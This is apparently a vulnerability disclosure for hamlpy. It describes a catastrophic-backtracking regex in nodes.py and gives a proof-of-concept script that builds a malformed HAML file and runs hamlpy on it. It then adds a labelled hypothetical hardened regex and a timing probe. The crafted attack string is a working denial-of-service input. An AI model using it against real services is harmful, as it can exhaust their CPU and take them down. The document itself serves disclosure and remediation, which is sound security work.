Description
The affected code is located in nodes.py, line 59. It uses the vulnerable regular expression \\([#=]\{\s*(.+?)\s*\}). When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the Python script below:
import os

# Write an otherwise ordinary HAML document around one malformed interpolation
f = open("./hamltest.haml", 'a')
f.write("#profile\n")
f.write("\t.left.column\n")
f.write("\t\t")
i = 100  # scales the length of the whitespace runs
f.write('\\#{' + '\t'*1651*i + '\x00' + '\t'*1651*i + '\n\\}')  # attack string
f.write("\n")
f.write("\t.right.column\n")
f.write("\t\t#bio Jesse Miller\n")
f.close()
os.system('hamlpy ./hamltest.haml')

I can provide you a patch to repair the ReDoS vulnerability.
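An added example, not code from the report or from hamlpy: the pattern quoted above beside a hypothetical unambiguous rewrite (an assumption, not the project's actual fix), with a small regression probe so the two can be compared on malformed input at modest sizes.

```python
import re
import time

# Pattern quoted in the report (nodes.py). Three adjacent quantified pieces,
# \s*, .+? and \s*, can each absorb the same run of whitespace, so when the
# closing "}" never arrives the engine retries every way of splitting it.
VULNERABLE = re.compile(r'\\([#=]\{\s*(.+?)\s*\})')

# Hypothetical hardened rewrite, NOT hamlpy's fix: the body must begin and
# end with a non-whitespace, non-brace character and may not contain "}" or
# a newline, so every character has exactly one owner and a failed match is
# abandoned after a single linear scan instead of a cubic search.
HARDENED = re.compile(r'\\([#=]\{\s*([^\s}\n](?:[^}\n]*[^\s}\n])?)\s*\})')


def extract(pattern, text):
    """Return (whole interpolation, trimmed body) for the first match, or None."""
    m = pattern.search(text)
    return (m.group(1), m.group(2)) if m else None


def regression_input(n):
    """Constructed malformed input with the shape the report describes:
    an escaped opening, whitespace, one byte, more whitespace, then a newline
    and an escaped brace, so no closing '}' is ever found."""
    return '\\#{' + '\t' * n + '\x00' + '\t' * n + '\n\\}'


def seconds_to_fail(pattern, n):
    """Wall-clock time for a search that must fail; keep n small for VULNERABLE."""
    start = time.perf_counter()
    pattern.search(regression_input(n))
    return time.perf_counter() - start


if __name__ == '__main__':
    print(extract(HARDENED, r'\#{ user.name }'))
    # Doubling n roughly multiplies the vulnerable time by eight; the
    # hardened pattern stays linear.
    for n in (50, 100, 200):
        print(n, round(seconds_to_fail(VULNERABLE, n), 3),
              round(seconds_to_fail(HARDENED, n), 3))
```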